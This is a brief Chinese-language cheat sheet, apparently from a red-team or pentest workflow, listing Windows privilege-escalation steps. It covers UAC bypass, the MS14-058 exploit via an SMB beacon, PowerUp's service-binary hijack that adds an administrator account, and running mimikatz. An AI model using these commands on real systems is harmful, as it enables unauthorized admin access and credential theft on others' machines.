1.BypassUAC
UAC 是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。
whoami /groups
用bypassuac命令来从中间相关联系的本地管理员到高度相关联系的本地管理员
2.使用ms14-058提权
Microsoft 安全公告 MS14-058 - 严重 | Microsoft Learn
smb-pipe beacon
3.powerup提权
powershell-import PowerTools/PowerUp/PowerUp.ps1
powershell Invoke-AllChecks
icacls 查看权限 F完全控制
增加用户系统用户
powershell Install-ServiceBinary -ServiceName Protect_2345Explorer -UserName rockyou123455 -Password 123456
4.运行mimikatz
————————————————————————————————————————————不要熄灭你的灵感及想象,不要成为你楷模的奴隶。